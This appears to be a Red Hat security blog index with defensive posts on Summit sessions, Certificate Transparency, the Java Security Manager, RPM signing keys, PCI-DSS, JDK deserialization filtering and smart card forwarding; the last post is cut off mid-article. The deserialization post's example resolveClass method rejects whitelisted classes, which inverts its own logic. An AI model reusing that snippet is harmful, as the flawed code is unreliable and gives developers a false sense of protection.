Warning message

Log in to add comments.

Latest Posts

  • Join us in San Francisco at the 2018 Red Hat Summit

    Authored by: Christopher Robinson

    This year’s Red Hat Summit will be held on May 8-10 in beautiful San Francisco, USA. Product Security will be joining many Red Hat security experts in presenting and assisting subscribers and partners at the show. Here is a sneak peek at the more than 125 sessions that a security-minded attendee can see at Summit this year.

    Sessions

    Cloud Management and Automation

    S1181 - Automating security and compliance for hybrid environments
    S1467 - Live demonstration: Find it. Fix it. Before it breaks.
    S1104 - Distributed API Management in a Hybrid Cloud Environment

    Containers and Openshift

    S1049 - Best practices for securing the container life cycle
    S1260 - Hitachi & Red Hat collaborate: container migration guide
    S1220 - Network Security for Apps on OpenShift
    S1225 - OpenShift for Operations
    S1778 - Security oriented OpenShift within regulated environments
    S1689 - Automating Openshift Secure Container Deployment at Experian

    Infrastructure Modernization & Optimization

    S1727 - Demystifying systemd
    S1741 - Deploying SELinux successfully in production environments
    S1329 - Operations Risk Remediation in Highly Secure Infrastructures
    S1515 - Path to success with your Identity Management deployment
    S1936 - Red Hat Satellite 6 power user tips and tricks
    S1907 - Satellite 6 Securing Linux lifecycle in the Public Sector
    S1931 - Security Enhanced Linux for Mere Mortals
    S1288 - Smarter Infrastructure Management with Satellite & Insights

    Middleware + Modern App Dev Security

    S1896 - Red Hat API Management Overview, Security Models and Roadmap
    S1863 - Red Hat Single Sign-On Present and Future
    S1045 - Securing Apps & Services with Red Hat Single-Sign On
    S2109 - Securing service mesh, micro services and modern applications with JWT
    S1189 - Mobile in a containers world

    Value of the Red Hat Subscription

    S1916 - Exploiting Modern Microarchitectures: Meltdown, Spectre, and other hardware security vulnerabilities in modern processors
    S2702 - The Value of a Red Hat Subscription

    Roadmaps & From the Office of the CTO

    S2502 - Charting new territories with Red Hat
    S9973 - Getting strategic about security
    S1017 - Red Hat Security Roadmap : It's a Lifestyle, Not a Product
    S1000 - Red Hat Security Roadmap for Hybrid Cloud
    S1890 - What's new in security for Red Hat OpenStack Platform?

    Instructor-Led Security Labs

    L1007, L1007R - A practical introduction to container security (3rd ed.)
    L1036 - Defend Yourself Using Built-in RHEL Security Technologies
    L1034, L1034R - Implementing Proactive Security and Compliance Automation
    L1051 - Linux Container Internals: Part 1
    L1052 - Linux Container Internals: Part 2
    L1019 - OpenShift + RHSSO = happy security teams and happy users
    L1106, L1106R - Practical OpenSCAP
    L1055 - Up and Running with Red Hat Identity Management

    Security Mini-Topic Sessions

    M1022 - A problem's not a problem, until it's a problem (Red Hat Insights)
    M1140 - Blockchain: How to identify good use cases
    M1087 - Monitor and automate infrastructure risk in 15 minutes or less

    Security Birds-of-a-Feather Sessions

    B1009 - Connecting the Power of Data Security and Privacy
    B1990 - Grafeas to gate your deployment pipeline
    B1046 - I'm a developer. What do I need to know about security?
    B1048 - Provenance and Deployment Policy
    B1062 - The Red Hat Security BoF - Ask us (most) anything
    B1036 - Virtualization: a study
    B2112 - Shift security left - and right - in the container lifecycle

    Security Panels

    P1757 - DevSecOps with disconnected OpenShift
    P1041 - Making IoT real across industries

    Security Workshops

    W1025 - Satellite and Insights Test-drive

    On top of the sessions, Red Hat Product Security will be there playing fun educational games like our Flawed and Branded card game and the famous GAME SHOW! GAME SHOW!

    No matter what your interest or specialty is, Red Hat Summit definitely has something for you. Come learn more about the security features and practices around our products! We're looking forward to seeing you there!

    Posted: 2018-04-23T14:30:00+00:00
  • Certificate Transparency and HTTPS

    Authored by: Kurt Seifried

    Google has announced that on April 30, 2018, Chrome will:

    “...require that all TLS server certificates issued after 30 April, 2018 be compliant with the Chromium CT Policy. After this date, when Chrome connects to a site serving a publicly-trusted certificate that is not compliant with the Chromium CT Policy, users will begin seeing a full page interstitial indicating their connection is not CT-compliant. Sub-resources served over https connections that are not CT-compliant will fail to load and will show an error in Chrome DevTools.”

    So what exactly does this mean, and why should one care?

    What is a CT policy?

    CT stands for “Certificate Transparency” and, in simple terms, means that all certificates for websites will need to be registered by the issuing Certificate Authority (CA) in at least two public Certificate Logs.

    When a CA issues a certificate, it now must make a public statement in a trusted database (the Certificate Log) that, at a certain date and time, they issued a certificate for some site. The reason is for more than a year many different CAs have issued certificates for sites and names for which they shouldn’t (like “localhost” or “1.2.3.”) or have issued certificates following fraudulent requests (e.g. people who are not BigBank asking for certificates for bigbank.example.com). By placing all requested certificates into these Certificate Logs, other groups, such as security researchers and companies, can monitor what is being issued and raise red flags as needed (e.g. if you see a certificate issued for your domain, which you did not request).

    If you do not announce your certificates in these Certificate Logs, the Chrome web browser will generate an error page that the user must click through before going to the page they were trying to load, and if a page contains elements (e.g. from advertising networks) that are served from non CT-compliant domains, they will simply not be loaded.

    Why is Google doing this?

    Well there are probably several reasons but the main ones are:

    1. As noted, several CAs have been discovered issuing certificates wrongly or fraudulently, putting Internet users at risk. This technical solution will greatly reduce the risk as such wrong or fraudulently issued certificates can be detected quickly.

    2. More importantly, this prepares for a major change coming to the Chrome web browser in July 2018, in which all HTTP websites will be labeled as “INSECURE”, which should significantly drive up the adoption of HTTPS. This adoption will, of course, result in a flood of new certificates which, combined with the oversight provided by Certificate Logs, should help to catch fraudulently or wrongly-obtained certificates.

    What should a web server operator do?

    The first step is to identify your web properties, both external facing and internal facing. Then it’s simply a matter of determining whether you:

    want the certificate for a website to show up in the Certificate Log so that the Chrome web browser does not generate an error (e.g. your public facing web sites will want this), or absolutely do not want that particular certificate to show up in the Certificate Logs (e.g. a sensitive internal host), and you’re willing to live with Chrome errors.

    Depending on how your certificates are issued, and who issued them, you may have some time before this becomes an issue (e.g. if you are using a service that issues short lived certificates you definitely will be affected by this). Also please note that some certificate issuers like Amazon’s AWS Certificate Manager do allow you to choose to opt out of reporting them to the Certificate Logs, a useful feature for certificates being used on systems that are “internal” and you do not want the world to know about.

    It should be noted that in the long term, option 2 (not reporting certificates to the Certificate Logs) will become increasingly problematic as it is possible that Google may simply have Chrome block them rather than generate an error. So, with that in mind, now is probably a good time to start determining how your security posture will change when all your HTTPS-based hosts are effectively being enumerated publicly. You will also need to determine what to do with any HTTP web sites, as they will start being labelled as “INSECURE” within the next few months, and you may need to deploy HTTPS for them, again resulting in them potentially showing up in the Certificate Logs.

    Posted: 2018-04-17T15:00:01+00:00
  • Harden your JBoss EAP 7.1 Deployments with the Java Security Manager

    Authored by: Jason Shepherd

    Overview

    The Java Enterprise Edition (EE) 7 specification introduced a new feature which allows application developers to specify a Java Security Manager (JSM) policy for their Java EE applications, when deployed to a compliant Java EE Application Server such as JBoss Enterprise Application Platform (EAP) 7.1. Until now, writing JSM policies has been pretty tedious, and running with JSM was not recommended because it adversely affected performance. Now a new tool has been developed which allows the generation of a JSM policy for deployments running on JBoss EAP 7.1. It is possible that running with JSM enabled will still affect performance, but JEP 232 indicates the performance impact would be 10-15% (it is still recommended to test the impact per application).

    Why Run with the Java Security Manager Enabled?

    Running a JSM will not fully protect the server from malicious features of untrusted code. It does, however, offer another layer of protection which can help reduce the impact of serious security vulnerabilities, such as deserialization attacks. For example, most of the recent attacks against Jackson Databind rely on making a Socket connection to an attacker-controlled JNDI Server to load malicious code. This article provides information on how this issue potentially affects an application written for JBoss EAP 7.1. The Security Manager could block the socket creation, and potentially thwart the attack.

    How to generate a Java Security Manager Policy

    Prerequisites

    • Java EE EAR or WAR file to add policies to;
    • Targeting JBoss EAP 7.1 or later;
    • Comprehensive test plan which exercises every "normal" function of the application.

    If a comprehensive test plan isn't available, a policy could be generated in a production environment, as long as some extra disk space for logging is available and there is confidence the security of the application is not going to be compromised while generating policies.

    Setup 'Log Only' mode for the Security Manager

    JBoss EAP 7.1 added a new feature to its custom Security Manager that is enabled by setting the org.wildfly.security.manager.log-only System Property to true.

    For example, if running in stand-alone mode on Linux, enable the Security Manager and set the system property in the bin/standalone.conf file using:

    SECMGR="true"
    JAVA_OPTS="$JAVA_OPTS -Dorg.wildfly.security.manager.log-only=true"
    

    We'll also need to add some additional logging for the log-only property to work, so go ahead and adjust the logging categories to set org.wildfly.security.access to DEBUG, as per the documentation, e.g.:

    /subsystem=logging/logger=org.wildfly.security.access:add
    /subsystem=logging/logger=org.wildfly.security.access:write-attribute(name=level,value=DEBUG)
    

    Test the application to generate policy violations

    For this example we'll use the batch-processing quickstart. Follow the README to deploy the application and access it running on the application server at http://localhost:8080/batch-processing. Click the 'Generate a new file and start import job' button in the Web UI and notice some policy violations are logged to the $JBOSS_HOME/standalone/log/server.log file, for example:

    DEBUG [org.wildfly.security.access] (Batch Thread - 1) Permission check failed (permission "("java.util.PropertyPermission" "java.io.tmpdir" "read")" in code source 
    "(vfs:/content/batch-processing.war/WEB-INF/classes <no signer certificates>)" of "ModuleClassLoader for Module "deployment.batch-processing.war" from Service Module Loader")
    

    Generate a policy file for the application

    Checkout the source code for the wildfly-policygen project written by Red Hat Product Security.

    git clone git@github.com:jasinner/wildfly-policygen.git
    

    Set the location of the server.log file which contains the generated security violations in the build.gradle script, i.e.:

    task runScript (dependsOn: 'classes', type: JavaExec) {
        main = 'com.redhat.prodsec.eap.EntryPoint'
        classpath = sourceSets.main.runtimeClasspath
        args '/home/jshepher/products/eap/7.1.0/standalone/log/server.log'
    }
    

    Run wildfly-policygen using gradle, i.e.:

    gradle runScript
    

    A permissions.xml file should be generated in the current directory. Using the example application, the file is called batch-processing.war.permissions.xml. Copy that file to src/main/webapp/META-INF/permissions.xml, build, and redeploy the application, for example:

    cp batch-processing.war.permissions.xml $APP_HOME/src/main/webapp/META-INF/permissions.xml
    

    Where APP_HOME is an environment variable pointing to the batch-processing application's home directory.

    Run with the security manager in enforcing mode

    Recall that we set the org.wildfly.security.manager.log-only system property in order to log permission violations. Remove that system property or set it to false in order to enforce the JSM policy that's been added to the deployment. Once that line has been changed or removed from bin/standalone.conf, restart the application server, build, and redeploy the application.

    JAVA_OPTS="$JAVA_OPTS -Dorg.wildfly.security.manager.log-only=false"
    

    Also go ahead and remove the extra logging category that was added previously using the CLI, e.g.:

    /subsystem=logging/logger=org.wildfly.security.access:remove
    

    This time there shouldn't be any permission violations logged in the server.log file. To verify the Security Manager is still enabled look for this message in the server.log file:

    INFO  [org.jboss.as] (MSC service thread 1-8) WFLYSRV0235: Security Manager is enabled
    

    Conclusion

    While the Java Security Manager will not prevent all security vulnerabilities possible against an application deployed to JBoss EAP 7.1, it will add another layer of protection, which could mitigate the impact of serious security vulnerabilities such as deserialization attacks against Jackson Databind. If running with Security Manager enabled, be sure to check the impact on the performance of the application to make sure it's within acceptable limits. Finally, use of the wildfly-policygen tool is not officially supported by Red Hat, however issues can be raised for the project in Github, or reach out to Red Hat Product Security for usage help by emailing secalert@redhat.com.

    Posted: 2018-03-14T13:30:00+00:00
  • Securing RPM signing keys

    Authored by: Huzaifa Sidhpurwala

    RPM Package Manager is the common method for deploying software packages to Red Hat Enterprise Linux, Fedora Project, and their derivative Linux operating systems. These packages are generally signed using an OpenPGP key, implementing a cryptographic integrity check, enabling the recipient the ability to verify that no modifications occurred after the package was signed (assuming the recipient has a copy of the sender’s public key). This model assumes that the signer has secured the RPM signing private keys and they will not be accessible to a powerful adversary.

    Before looking into possible solutions to the problem of securing RPM-signing keys, its worth mentioning that signing RPMs is not a complete solution. When using yum repositories, transport security (HTTPS) needs to be enabled to ensure that RPM packages, and the associated metadata (which contains pkg checksums, timestamps, dependency information etc), are transmitted securely. Lastly, sysadmins should always ensure that packages are installed from trusted repositories.

    How RPM signing works

    The rpm file format is a binary format and broadly consists of 4 sections:
    - the legacy lead is a 96 byte header which contains "magic numbers" (used to identify file type) and other data;
    - an optional signature section;
    - a header which is an index containing information about the RPM package file; and
    - the cpio archive of the actual files to be written to the filesystem.

    During the signing process, GnuPG calculates a signature from the header and the cpio section using the private key. This OpenPGP signature is stored in the optional signature section of the RPM file.

    Diagram depicting the header and payload of the RPM is signed and that the signature is also stored in the RPM.

    During verfication, GnuPG uses the public key to verify the integrity of both these sections.

    Diagram showing the process for verifying the header and payload of an RPM.

    The above is normally referred to as RPM v3 signatures. RPM version 4 and above introduce v4 signatures which are calculated on the header alone. The file contents are hashed and those hashes are protected by the header-only signature, so the payload can be validated without actually having a signature on it.

    How to sign rpms

    The RPM binary internally uses OpenPGP, which has been traditionally used for signing emails. The process involves creating a key pair using OpenPGP and then using the private key to sign the RPMs while the public key is published securely to enable users to verify the integrity of the binary RPMs after downloading them.

    Currently there is no way to directly sign RPMS using x509 certificates. If you really want to use x509 certificates you can sign RPMs like any other files by signing the entire RPM file using openssl, nss, or any other x509 tool and appending distributing the signature and the certificate you want to verify against with the RPM file.

    Using a Hardware Security Module

    A Hardware Security Module (HSM) is a physical computing device which can manage and safeguard digital keys. They also provide cryptographic processing like key generation, signing, encryption, and decryption. Various HSM devices are available in the market which have varying features and costs. Several HSM devices are now available as USB sticks that, once plugged in, the GPG tool should be able to recognize and generate new keys, sign and verify files using the on-device private keys.

    Typically, keys are generated inside the HSM where they are then stored. The HSM is then installed on specially configured systems which are used for signing RPMs. These systems may be disconnected from the Internet to ensure additional security. Even if the HSM is stolen, it may not be possible to extract the private key from the HSM.

    With time HSM devices have become cheaper and more easily available.

    Securely publishing public keys

    While the conventional method of publishing OpenPGP public keys on HTTPS protected websites exists, DNSSEC (or DNS for that matter) provides an elegant solution for further securing the integrity of the published public keys.

    PKA is a simple way of storing the look up information for your public key in a DNS TXT record. DNSSEC can store the fingerprint of the public key, as well as their storage location. DNS records can further be signed to provide additional security.

    All RPMs released by Red Hat are signed, and the public keys are distributed with the products and also published online.

    Posted: 2018-03-07T14:30:00+00:00
  • Let's talk about PCI-DSS

    Authored by: Langley Rock

    For those who aren’t familiar with Payment Card Industry Data Security Standard (PCI-DSS), it is the standard that is intended to protect our credit card data as it flows between systems and is stored in company databases. PCI-DSS requires that all vulnerabilities rated equal to, or higher than, CVSS 4.0 must be addressed by PCI-DSS compliant organizations (notably, those which process and/or store cardholder data). While this was done with the best of intentions, it has had an impact on many organizations' capability to remediate these vulnerabilities in their environment.

    The qualitative severity ratings of vulnerabilities as categorized by Red Hat Product Security do not directly align with the baseline ratings recommended by CVSS. These CVSS scores and ratings are used by PCI-DSS and most scanning tools. As a result, there may be cases where a vulnerability which would be rated as low severity by Red Hat, may exceed the CVSS’ recommended threshold for PCI-DSS.

    Red Hat has published guidelines on vulnerability classification. Red Hat Product Security prioritizes focus of security flaw remediation on Critical and Important vulnerabilities, which provide compromise to confidentiality, data, and/or availability. This is not intended to downplay the importance of lower severity vulnerabilities, but rather, aims to target those risks which are seen as most important by our customers and industry at large. CVSS ratings for vulnerabilities build upon a set of assumptions, factoring in a worst-case scenario (i.e. the CVSS calculator leaves all Temporal and Environmental factors set to “undefined”) possibly resulting in an environment that has no security mitigations or blocking controls in place, which might not be an accurate representation of your environment. Specifically, a given flaw may be less significant in your application depending how the function is used, whether it is exposed to untrusted data, or whether it enforces a privilege boundary. It is Red Hat’s position, that the base CVSS scores alone cannot reliably be used to fully capture the importance of flaws in every use case.

    In most cases, security issues will be addressed when updates are available upstream. However, as noted above, there may be cases where a vulnerability rated as low severity by Red Hat, may exceed the CVSS’ threshold for vulnerability mitigation by the PCI-DSS standard and be considered actionable by a security scanner or during an audit by a Qualified Scanning Auditor (QSA).

    In light of the above, Red Hat does not claim any of its products meet PCI-DSS compliance requirements. We do strive to provide secure software solutions and guidance to help remediate vulnerabilities of notable importance to our customers.

    When there is a discrepancy in the security flaw ratings, we suggest the following:

    • Harden your system: Determine if the component is needed or used. In many cases, scans will pick up on packages which are included in the distribution but do not need to be deployed in the production environment. If customers can remove these packages, or replace with another unaffected package, without impacting their functional system, they reduce the attack surface and reduce the number of components which might be targeted.

    • Validate the application: Determine if the situation is a false positive. (Red Hat often backports fixes which may result in false positives for version-detecting scanning products).

    • Self-evaluate the severity: Update the base CVSS score by calculating the environmental factors that are relevant, document the updated CVSS score for the vulnerability respective to your environment. All CVSS vector strings in our CVE pages link to the CVSS calculator on FIRST's website, with the base score pre-populated so that customers just need to fill in their other metrics.

    • Implement other controls to limit (or eliminate) exposure of the vulnerable interface or system.

    Further technical information to make these determinations can often be found from product support, in the various technical articles and blogs Red Hat makes available, in CVE pages’ Statement or Mitigation sections and in Bugzilla tickets. Customers with support agreements can reach out to product support for additional assistance to evaluate the potential risk for their environment, and confirm if the vulnerability jeopardizes the confidentiality of PCI-DSS data.

    Red Hat recognizes vulnerability scores and impacts may differ, and are there to help you assess your environment. As a customer, you can open a support case and provide us the feedback that matters to you. Our support and product teams value this feedback and will use it to provide better results.

    Posted: 2018-02-28T14:30:00+00:00
  • JDK approach to address deserialization Vulnerability

    Authored by: Hooman Broujerdi

    Java Deserialization of untrusted data has been a security buzzword for the past couple of years with almost every application using native Java serialization framework being vulnerable to Java deserialization attacks. Since it's inception, there have been many scattered attempts to come up with a solution to best address this flaw. This article focuses on Java deserialization vulnerability and explains how Oracle provides a mitigation framework in it's latest Java Development Kit (JDK) version.

    Background

    Let's begin by reviewing the Java deserialization process. Java Serialization Framework is JDK's built-in utility that allows Java objects to be converted into byte representation of the object and vice versa. The process of converting Java objects into their binary form is called serialization and the process of reading binary data to construct a Java object is called deserialization. In any enterprise environment the ability to save or retrieve the state of the object is a critical factor in building reliable distributed systems. For instance, a JMS message may be serialized to a stream of bytes and sent over the wire to a JMS destination. A RESTful client application may serialize an OAuth token to disk for future verification. Java's Remote Method Invocation (RMI) uses serialization under the hood to pass objects between JVMs. These are just some of the use cases where Java serialization is used.

    Inspecting the Flow

    When the application code triggers the deserialization process, ObjectInputStream will be initialized to construct the object from the stream of bytes. ObjectInputStream ensures the object graph that has been serialized is recovered. During this process, ObjectInputStream matches the stream of bytes against the classes that are available in the JVM's classpath.

    So, what is the problem?

    During deserialization process, when readObject() takes the byte stream to reconstruct the object, it looks for the magic bytes relevant to the object type that has been written to the serialization stream, to determine what object type (e.g. enum, array, String, etc.) it needs to resolve the byte stream to. If the byte stream can not be resolved to one of these types, then it will be resolved to an ordinary object (TC_OBJECT), and finally the local class for that ObjectStreamClass will be retrieved from the JVM's classpath. If the class is not found then an InvalidClassException will be thrown.

    The problem arises when readObject() is presented with a byte stream that has been manipulated to leverage classes that have a high chance of being available in the JVM's classpath, also known as gadget classes, and are vulnerable to Remote Code Execution (RCE). So far a number of classes have been identified to be vulnerable to RCE, however research is still ongoing to discover more of such classes. Now you might ask, how these classes can be used for RCE? Well, depending on the nature of the class, the attack can be materialized by constructing the state of that particular class with a malicious payload, which is serialized and is fed at the point in which serialized data is exchanged (i.e. Stream Source) in the above work flow. This tricks JDK to believe this is the trusted byte stream, and it will be deserialized by initializing the class with the payload. Depending on the payload this can have disastrous consequences.

    JVM vulnerable classes

    Of course the challenge for the adversary is to be able to access the stream source for this purpose, of which the details are outside the scope of this article. A good tool to review for further information on the subject is ysoserial, which is arguably the best tool for generating payloads.

    How to mitigate against deserialization?

    Loosely speaking, mitigation against a deserialization vulnerability is accomplished by implementing a LookAheadObjectInputStream strategy. The implementation needs to subclass the existing ObjectInputStream to override the resolveClass() method to verify if the class is allowed to be loaded. This approach appears to be an effective way of hardening against deserialization and usually consists of two implementation flavors: whitelist or blacklist. In whitelist approach, implementation only includes the acceptable business classes that are allowed to be deserialized and blocks other classes. Blacklist implementation on the other hand holds a set of well-known classes that are vulnerable and blocks them from being serialized.

    Both whitelist and blacklist have their own pros and cons, however, whitelist-based implementation proves to be a better way to mitigate against a deserialization flaw. It effectively follows the principle of checking the input against the good values which have always been a part of security practices. On the other hand, blacklist-based implementation heavily relies on the intelligence gathered around what classes have been vulnerable and gradually include them in the list which is easy enough to be missed or bypassed.

    protected Class<?> resolveClass(ObjectStreamClass desc)
                    throws IOException, ClassNotFoundException {
          String name = desc.getName();
    
          if(isBlacklisted(name) ) {
                  throw new SecurityException("Deserialization is blocked for security reasons");
          }
    
          if(isWhitelisted(name) ) {
                  throw new SecurityException("Deserialization is blocked for security reasons");
          }
    
          return super.resolveClass(desc);
    }
    

    JDK's new Deserialization Filtering

    Although ad hoc implementations exist to harden against a deserialization flaw, the official specification on how to deal with this issue is still lacking. To address this issue, Oracle has recently introduced serialization filtering to improve the security of deserialization of data which seems to have incorporated both whitelist and blacklist scenarios. The new deserialization filtering is targeted for JDK 9, however it has been backported to some of the older versions of JDK as well.

    The core mechanism of deserialization filtering is based on an ObjectInputFilter interface which provides a configuration capability so that incoming data streams can be validated during the deserialization process. The status check on the incoming stream is determined by Status.ALLOWED, Status.REJECTED, or Status.UNDECIDED arguments of an enum type within ObjectInputFilter interface. These arguments can be configured depending on the deserialization scenarios, for instance if the intention is to blacklist a class then the argument will return Status.REJECTED for that specific class and allows the rest to be deserialized by returning the Status.UNDECIDED. On the other hand if the intention of the scenario is to whitelist then Status.ALLOWED argument can be returned for classes that match the expected business classes. In addition to that, the filter also allows access to some other information for the incoming deserializing stream, such as the number of array elements when deserializing an array of class (arrayLength), the depth of each nested objects (depth), the current number of object references (references), and the current number of bytes consumed (streamBytes). This information provides more fine-grained assertion points on the incoming stream and return the relevant status that reflects each specific use cases.

    Ways to configure the Filter

    JDK 9 filtering supports 3 ways of configuring the filter: custom filter, process-wide filter also known as global filter, and built-in filters for the RMI registry and Distributed Garbage Collection (DGC) usage.

    Case-based Filters

    The configuration scenario for a custom filter occurs when a deserialization requirement is different from any other deserialization process throughout the application. In this use case a custom filter can be created by implementing the ObjectInputFilter interface and override the checkInput(FilterInfo filterInfo) method.

    static class VehicleFilter implements ObjectInputFilter {
            final Class<?> clazz = Vehicle.class;
            final long arrayLength = -1L;
            final long totalObjectRefs = 1L;
            final long depth = 1l;
            final long streamBytes = 95L;
    
            public Status checkInput(FilterInfo filterInfo) {
                if (filterInfo.arrayLength() < this.arrayLength || filterInfo.arrayLength() > this.arrayLength
                        || filterInfo.references() < this.totalObjectRefs || filterInfo.references() > this.totalObjectRefs
                        || filterInfo.depth() < this.depth || filterInfo.depth() > this.depth || filterInfo.streamBytes() < this.streamBytes
                        || filterInfo.streamBytes() > this.streamBytes) {
                    return Status.REJECTED;
                }
    
                if (filterInfo.serialClass() == null) {
                    return Status.UNDECIDED;
                }
    
                if (filterInfo.serialClass() != null && filterInfo.serialClass() == this.clazz) {
                    return Status.ALLOWED;
                } else {
                    return Status.REJECTED;
                }
            }
        }
    

    JDK 9 has added two methods to the ObjectInputStream class allowing the above filter to be set/get for the current ObjectInputStream:

    public class ObjectInputStream
        extends InputStream implements ObjectInput, ObjectStreamConstants {
    
        private ObjectInputFilter serialFilter;
        ...
        public final ObjectInputFilter getObjectInputFilter() {
            return serialFilter;
        }
    
        public final void setObjectInputFilter(ObjectInputFilter filter) {
            ...
            this.serialFilter = filter;
        }
        ...
    } 
    

    Contrary to JDK 9, latest JDK 8 (1.8.0_144) seems to only allow filter to be set on ObjectInputFilter.Config.setObjectInputFilter(ois, new VehicleFilter()); at the moment.

    Process-wide (Global) Filters

    Process-wide filter can be configured by setting jdk.serialFilter as either a system property or a security property. If the system property is defined then it is used to configure the filter; otherwise the filter checks for the security property (i.e. jdk1.8.0_144/jre/lib/security/java.security) to configure the filter.

    The value of jdk.serialFilter is configured as a sequence of patterns either by checking against the class name or the limits for incoming byte stream properties. Patterns are separated by semicolon and whitespace is also considered to be part of a pattern. Limits are checked before classes regardless of the order in which the pattern sequence is configured. Below are the limit properties which can be used during the configuration:

    - maxdepth=value // the maximum depth of a graph
    - maxrefs=value // the maximum number of the internal references
    - maxbytes=value // the maximum number of bytes in the input stream
    - maxarray=value // the maximum array size allowed
    

    Other patterns match the class or package name as returned by Class.getName(). Class/Package patterns accept asterisk (*), double asterisk (**), period (.), and forward slash (/) symbols as well. Below are a couple pattern scenarios that could possibly happens:

    // this matches a specific class and rejects the rest
    "jdk.serialFilter=org.example.Vehicle;!*" 
    
     // this matches all classes in the package and all subpackages and rejects the rest 
    - "jdk.serialFilter=org.example.**;!*" 
    
    // this matches all classes in the package and rejects the rest 
    - "jdk.serialFilter=org.example.*;!*" 
    
     // this matches any class with the pattern as a prefix
    - "jdk.serialFilter=*;
    

    Built-in Filters

    JDK 9 has also introduced additional built-in, configurable filters mainly for RMI Registry and Distributed Garbage Collection (DGC) . Built-in filters for RMI Registry and DGC white-list classes that are expected to be used in either of these services. Below are classes for both RMIRegistryImpl and DGCImp:

    RMIRegistryImpl

    java.lang.Number
    java.rmi.Remote
    java.lang.reflect.Proxy
    sun.rmi.server.UnicastRef
    sun.rmi.server.RMIClientSocketFactory
    sun.rmi.server.RMIServerSocketFactory
    java.rmi.activation.ActivationID
    java.rmi.server.UID
    

    DGCImpl

    java.rmi.server.ObjID
    java.rmi.server.UID
    java.rmi.dgc.VMID
    java.rmi.dgc.Lease
    

    In addition to these classes, users can also add their own customized filters using sun.rmi.registry.registryFilter and sun.rmi.transport.dgcFilter system or security properties with the property pattern syntax as described in previous section.

    Wrapping up

    While Java deserialization is not a vulnerability itself, deserialization of untrusted data using JDK's native serialization framework is. It is important to differentiate between the two, as the latter is introduced by a bad application design rather than being a flaw. Java deserialization framework prior to JEP 290 however, did not have any validation mechanism to verify the legitimacy of the objects. While there are a number of ways to mitigate against JDK's lack of assertion on deserializing objects, there is no concrete specification to deal with this flaw within the JDK itself. With JEP 290, Oracle introduced a new filtering mechanism to allow developers to configure the filter based on a number of deserialization scenarios. The new filtering mechanism seems to have made it easier to mitigate against deserialization of untrusted data should the need arises.

    Posted: 2018-02-21T14:30:00+00:00
  • Smart card forwarding with Fedora

    Authored by: Daiki Ueno

    Smart cards and hardware security modules (HSM) are technologies used to keep private keys secure on devices physically isolated from other devices while allowing access only to an authorized user. That way only the intended user can use that device to authenticate, authorize, or perform other functions that involve the private keys while others are prevented from gaining access. These devices usually come in the form of a USB device or token which is plugged into the local computer.

    In modern "cloud" computing, it is often desirable to use such a device like a smart card on remote servers. For example, one can sign software or documents on a remote server, use the local smart card to authenticate to Kerberos, or other possible uses.

    There are various approaches to tackle the problem of using a local smart card on a remote system, and on different levels of the smart card application stack. It is possible to forward the USB device holding the smart card, or forward the lower-level PC/SC protocol which some smart cards talk, or forward the high-level interface used to communicate with smart cards, the PKCS#11 interface. It is also possible to forward between systems one’s OpenPGP keys via GnuPG by using gpg-agent, or one’s SSH keys via ssh-agent. While these are very useful approaches when we are restricted to one particular set of keys, or a single application, they fail to provide a generic smart card or forwarding mechanism.

    Hence, in Fedora, we followed the approach of forwarding the higher level smart card interface, PKCS#11, as it provides the following advantages:

    • Unlike USB forwarding it does not require administrator access on the remote system, nor any special interaction with the remote system’s kernel.
    • It can be used to forward more than just smart cards, that is, a Trusted Platform Module (TPM) chip or any HSM can also be forwarded over the PKCS#11 interface.
    • Unlike any application-specific key forwarding mechanism, it forwards the whole feature set of the card, allowing it to access items like X.509 certificates, secret keys, and others.

    In the following sections we describe the approach and tools needed to perform that forwarding over SSH secure communication channels.

    Scenario

    We assume having a local workstation, and a remote server. On the local computer we have inserted a smart card (in our examples we will use a Nitrokey card, which works very well with the OpenSC drivers). We will forward the card from the workstation to the remote server and demonstrate various operations with the private key on the card.

    Installing required packages

    Fedora, by default, includes smart card support; the additional components required to forward the card are available as part of the p11-kit-server package, which should be installed on both client and server. For the following examples we will also use some tools from gnutls-utils; these tools can be installed with DNF as follows:

     $ dnf install p11-kit p11-kit-server gnutls-utils libp11
    

    The following sections assume both local and remote computers are running Fedora and the above packages are installed.

    Setting up the PKCS#11 forwarding server on a local client

    To forward a smart card to a remote server, you first need to identify which smart cards are available. To list the smart cards currently attached to the local computer, use the p11tool command from the gnutls-utils package. For example:

     $ p11tool --list-tokens
     ...
     Token 6:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: opensc-pkcs11.so
     ...
    

    This is the entry for the card I’d like to forward to remote system. The important pieces are the ‘pkcs11:’ URL listed above, and the module name. Once we determine which smart card to forward, we expose it to a local Unix domain socket, with the following p11-kit server command:

     $ p11-kit server --provider /usr/lib64/pkcs11/opensc-pkcs11.so “pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29”
    

    Here we provide, to the server, the module location (optional) with the --provider option, as well as the URL of the card. We used the values from the Module and URL lines of the p11tool output above. When the p11-kit server command starts, it will print the address of the PKCS#11 unix domain socket and the process ID of the server:

    P11_KIT_SERVER_ADDRESS=unix:path=/run/user/12345/p11-kit/pkcs11-12345
    P11_KIT_SERVER_PID=12345
    

    For later use, set the variables output by the tool on your shell prompt (e.g., copy and paste them or call the above p11-kit server command line with eval $(p11-kit server ...)).

    Forwarding and using the PKCS#11 Unix socket on the remote server

    On the remote server, we will initially forward the previously generated PKCS#11 unix socket, and then access the smart card through it. To access the forwarded socket as if it were a smart card, a dedicated PKCS#11 module p11-kit-client.so is provided as part of the p11-kit-server package.

    Preparing the remote system for PKCS#11 socket forwarding

    One important detail you should be aware of, is the file system location of the forwarded socket. By convention, the p11-kit-client.so module utilizes the "user runtime directory", managed by systemd: the directory is created when a user logs in, and removed upon logout, so that the user doesn't need to manually clean up the socket file.

    To locate your user runtime directory, do:

     $ systemd-path user-runtime
     /run/user/1000
    

    The p11-kit-client.so module looks for the socket file under a subdirectory (/run/user/1000/p11-kit in this example). To enable auto-creation of the directory, do:

     $ systemctl --user enable p11-kit-client.service
    

    Forwarding the PKCS#11 socket

    We will use ssh to forward the local PKCS#11 unix socket to the remote server. Following the p11-kit-client convention, we will forward the socket to the remote user run-time path so that cleaning up on disconnect is not required. The remote location of the run-time path can be obtained as follows:

    $ ssh <user>@<remotehost> systemd-path user-runtime
    /run/user/1000
    

